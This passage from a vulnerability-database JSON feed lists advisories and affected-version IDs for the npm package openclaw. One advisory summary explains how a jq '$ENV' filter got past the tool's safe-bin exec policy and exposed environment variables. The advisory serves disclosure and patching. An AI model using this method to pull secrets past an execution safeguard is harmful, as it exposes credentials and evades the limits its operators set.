ithub.com/openclaw/openclaw/security/advisories/GHSA-2858-xg23-26fp","reference_id":"GHSA-2858-xg23-26fp","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2858-xg23-26fp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability"
:"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability"
:"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability"
:"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability"
:"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability"
:"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability"
:"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["GHSA-2858-xg23-26fp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCI
D-zda4-uuw4-fkhp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90951?format=json","vulnerability_id":"VCID-zf3q-78js-k7ce","summary":"OpenClaw safeBins jq `$ENV` filter bypass allows environment variable disclosure\n## Summary\n\nThe jq safe-bin policy blocked explicit `env` usage but still allowed jq programs that accessed environment data through `$ENV`.\n\n## Impact\n\nAn operator-approved safe-bin jq command could disclose environment variables that the safe-bin policy was supposed to keep out of scope.\n\n## Affected Component\n\n`src/infra/exec-safe-bin-semantics.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `78e2f3d66d` (`Exec: tighten jq safe-bin env checks`).\n\nThanks @nicky-cc  of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/78e2f3d66d74e5c7e6f45c54162e63986e39771b","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/78e2f3d66d74e5c7e6f45c54162e63986e39771b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jccr-rrw2-vc8h","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HI
GH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jccr-rrw2-vc8h"},{"reference_url":"https://github.com/advisories/GHSA-jccr-rrw2-vc8h","reference_id":"GHSA-jccr-rrw2-vc8h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jccr-rrw2-vc8h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerabilit
y":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerabilit
y":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerabilit
